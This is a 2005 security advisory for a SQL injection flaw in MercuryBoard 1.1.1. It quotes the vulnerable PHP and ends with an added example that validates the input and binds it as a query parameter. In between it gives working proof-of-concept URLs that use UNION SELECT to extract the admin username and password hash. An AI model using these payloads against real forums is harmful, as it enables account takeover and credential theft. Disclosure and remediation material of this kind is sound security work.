{==============================================================================}
{                              [ Zeelock-2005 ]                                }
{==============================================================================}
{                                                                              }
{                       M E R C U R Y B O A R D                                }
{                                                                              }
{              [ Critical SQL Injection - Working Exploit ]                    }
{                                                                              }
{                                                                              }
{==============================================================================}

Date: 7th February 2005
Version Vulnerable: <= 1.1.1
Version Fixed: 1.1.2

"Validate anything that can be passed. Security lies in the inputs."  - zk

Description
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MercuryBoard is a powerful message board system dedicated to raw speed with a
mixture of features, ease of use, and ease of customization coupled with
expandability, and diverse language services. Now just over two years in the
making, version 1.0.0 is an immensely stable, thoroughly tested, and well
written piece of internet software ready for any webserver, running on PHP
versions as low as 4.0.0 and MySQL versions as low as 3.22.

For more information: http://www.mercuryboard.com/index.php?a=about

Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Andrea Trivero of Codebug Security (www.codebug.org) found a number of security
flaws in this code: many XSS issues and some SQL injections. However, he did not
provide a working exploit.

Looking at the following piece of code in func/post.php, we can see that when
the "qu" variable is passed along with the "reply" switch, we can inject
anything through the "qu" parameter passed via GET from the browser, because it
is not sanitized at all before being interpolated into the query.
--------[ Mercury 1.1.1 original code ]--------------
if (($s == 'reply') && isset($this->get['qu'])) {
    // $this->get['qu'] comes straight from the GET request and is placed
    // into the SQL string without any validation or escaping.
    $query = $this->db->fetch("SELECT p.post_text, m.user_name FROM {$this->pre}posts p, {$this->pre}users m WHERE p.post_id={$this->get['qu']} AND p.post_author=m.user_id");
--------[/Mercury 1.1.1 original code ]--------------

Now we can try to inject something:

http://www.site.com/mercuryboard/index.php?a=post&s=reply&t=1&qu=10000%20UNION%20SELECT%20null,null/*

The only thing we have to keep in mind is that the "t" parameter should refer
to a topic we have permission to reply to, and the "qu" parameter should refer
to a non-existing post. We get no errors, so we can go further.

Proof of concept
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/mercuryboard/index.php?a=post&s=reply&t=1&qu=10000%20UNION%20SELECT%20user_password,user_name%20from%20mb_users%20where%20user_group%20=%201%20limit%201/*

You should then see the admin username and the admin password hash inside the
reply form, between the [quote] tags.

Note: during installation you may have chosen a different prefix for the
tables. You need to adjust the table name in the query accordingly to retrieve
the information from the database.
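For comparison, the same lookup as the func/post.php snippet above with the "qu" value validated and bound as a query parameter. This is an added example written for this advisory, not MercuryBoard's own code or its 1.1.2 fix; it assumes a PDO connection (modern PHP) and a table prefix supplied from configuration, and the function name fetchQuotedPost is hypothetical.

```php
<?php
// Added example, not MercuryBoard code: the quoted-post lookup with the
// request value validated as an integer and passed as a bound parameter.

function fetchQuotedPost(PDO $db, string $prefix, $qu): ?array
{
    // post_id is an integer column: accept only a plain decimal integer
    // and reject anything else before it gets anywhere near the SQL.
    if (!is_int($qu) && !is_string($qu)) {
        return null;
    }
    if (!preg_match('/^\d{1,10}$/', (string) $qu)) {
        return null;
    }
    $postId = (int) $qu;

    // The prefix comes from configuration, not from the request, but it is
    // still interpolated into an identifier, so restrict it to safe chars.
    if (!preg_match('/^[A-Za-z0-9_]*$/', $prefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }

    // The value is bound, never concatenated, so a payload such as
    // "10000 UNION SELECT ..." can only ever be treated as a number
    // (and is already rejected by the check above).
    $sql = "SELECT p.post_text, m.user_name "
         . "FROM {$prefix}posts p, {$prefix}users m "
         . "WHERE p.post_id = :post_id AND p.post_author = m.user_id";
    $stmt = $db->prepare($sql);
    $stmt->bindValue(':post_id', $postId, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage (constructed example, connection details are placeholders):
// $db = new PDO('mysql:host=localhost;dbname=board', $user, $pass);
// $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// fetchQuotedPost($db, 'mb_', '10000 UNION SELECT null,null/*'); // null, no query run
// fetchQuotedPost($db, 'mb_', '42');                              // row or null
```

The integer check alone would have stopped the payload in this advisory; the bound parameter is what keeps the query safe for any value that does reach it.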